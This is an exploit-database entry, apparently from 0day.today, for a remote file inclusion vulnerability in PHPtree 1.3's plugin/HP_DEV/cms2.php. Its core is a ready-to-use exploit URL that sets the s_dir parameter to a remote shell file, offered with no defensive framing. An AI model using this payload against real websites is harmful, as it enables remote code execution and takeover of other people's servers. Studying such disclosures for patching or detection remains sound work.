id: 1837
date: 05/04/2007
title: PHPtree 1.3 (cms2.php s_dir) Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

================================================================
PHPtree 1.3 (cms2.php s_dir) Remote File Inclusion Vulnerability
================================================================


#PHPtree Remote file inclusion (s_dir)

#Download script : http://www.phptree.de/content/download/public/phptree/phptree_v1.3.zip

#Exploit

#http://site.com/[phptree_path]/plugin/HP_DEV/cms2.php?s_dir=shell.txt?

#Discovered by : ThE TiGeR



#  0day.today [2023-03-23]  #